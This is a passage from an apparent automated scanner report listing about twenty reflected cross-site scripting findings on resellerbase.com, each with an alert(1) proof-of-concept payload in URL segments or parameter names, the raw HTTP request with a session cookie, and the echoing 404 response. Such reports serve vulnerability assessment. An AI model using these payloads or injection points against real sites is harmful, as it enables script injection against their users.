2.1023. http://www.resellerbase.com/detail/12/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 953b8<script>alert(1)</script>c384c2bbfa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail953b8<script>alert(1)</script>c384c2bbfa/12/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail953b8<script>alert(1)</script>c384c2bbfa/12/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1024. http://www.resellerbase.com/detail/12/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 967c3<script>alert(1)</script>9762adc8680 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12967c3<script>alert(1)</script>9762adc8680/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12967c3<script>alert(1)</script>9762adc8680/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1025. http://www.resellerbase.com/detail/12/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 801fc<script>alert(1)</script>8b8f1adb10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes801fc<script>alert(1)</script>8b8f1adb10/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes801fc<script>alert(1)</script>8b8f1adb10/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1026. http://www.resellerbase.com/detail/12/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 713ee<script>alert(1)</script>1f89060ef92 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos713ee<script>alert(1)</script>1f89060ef92/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos713ee<script>alert(1)</script>1f89060ef92/ was not found on this server.</p>
...[SNIP]...

2.1027. http://www.resellerbase.com/detail/12/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62780<script>alert(1)</script>a1a05510276 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/?62780<script>alert(1)</script>a1a05510276=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/?62780<script>alert(1)</script>a1a05510276=1 was not found on this server.</p>
...[SNIP]...

2.1028. http://www.resellerbase.com/detail/12/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52175<script>alert(1)</script>f981271362f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail52175<script>alert(1)</script>f981271362f/12/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail52175<script>alert(1)</script>f981271362f/12/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1029. http://www.resellerbase.com/detail/12/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 81ec4<script>alert(1)</script>ba5649483a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1281ec4<script>alert(1)</script>ba5649483a4/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1281ec4<script>alert(1)</script>ba5649483a4/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1030. http://www.resellerbase.com/detail/12/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6137e<script>alert(1)</script>7c27768a7c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes6137e<script>alert(1)</script>7c27768a7c3/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes6137e<script>alert(1)</script>7c27768a7c3/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1031. http://www.resellerbase.com/detail/12/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f500<script>alert(1)</script>0b2c64a3411 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos8f500<script>alert(1)</script>0b2c64a3411/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos8f500<script>alert(1)</script>0b2c64a3411/images/ was not found on this server.</p>
...[SNIP]...

2.1032. http://www.resellerbase.com/detail/12/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6da89<script>alert(1)</script>63e2420cfc4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images6da89<script>alert(1)</script>63e2420cfc4/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images6da89<script>alert(1)</script>63e2420cfc4/ was not found on this server.</p>
...[SNIP]...

2.1033. http://www.resellerbase.com/detail/12/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 11ee8<script>alert(1)</script>5a5e6dbcf25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/?11ee8<script>alert(1)</script>5a5e6dbcf25=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/?11ee8<script>alert(1)</script>5a5e6dbcf25=1 was not found on this server.</p>
...[SNIP]...

2.1034. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5e521<script>alert(1)</script>2ae0de5c4f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5e521<script>alert(1)</script>2ae0de5c4f3/12/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5e521<script>alert(1)</script>2ae0de5c4f3/12/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1035. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload beab0<script>alert(1)</script>8334f775e75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12beab0<script>alert(1)</script>8334f775e75/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12beab0<script>alert(1)</script>8334f775e75/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1036. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6d54b<script>alert(1)</script>abaf1ebbc0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes6d54b<script>alert(1)</script>abaf1ebbc0d/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes6d54b<script>alert(1)</script>abaf1ebbc0d/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1037. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f1ac<script>alert(1)</script>ebe64e30b58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos7f1ac<script>alert(1)</script>ebe64e30b58/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos7f1ac<script>alert(1)</script>ebe64e30b58/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1038. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c5333<script>alert(1)</script>fe5c1543ee6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/imagesc5333<script>alert(1)</script>fe5c1543ee6/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/imagesc5333<script>alert(1)</script>fe5c1543ee6/rating/ was not found on this server.</p>
...[SNIP]...

2.1039. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d963d<script>alert(1)</script>926d16b8144 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/ratingd963d<script>alert(1)</script>926d16b8144/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/ratingd963d<script>alert(1)</script>926d16b8144/ was not found on this server.</p>
...[SNIP]...

2.1040. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dd616<script>alert(1)</script>69210a0ab04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating/?dd616<script>alert(1)</script>69210a0ab04=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/?dd616<script>alert(1)</script>69210a0ab04=1 was not found on this server.</p>
...[SNIP]...

2.1041. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13e9e<script>alert(1)</script>5dcea266e7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail13e9e<script>alert(1)</script>5dcea266e7a/12/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail13e9e<script>alert(1)</script>5dcea266e7a/12/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1042. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d224<script>alert(1)</script>eb42a6969bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/123d224<script>alert(1)</script>eb42a6969bd/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
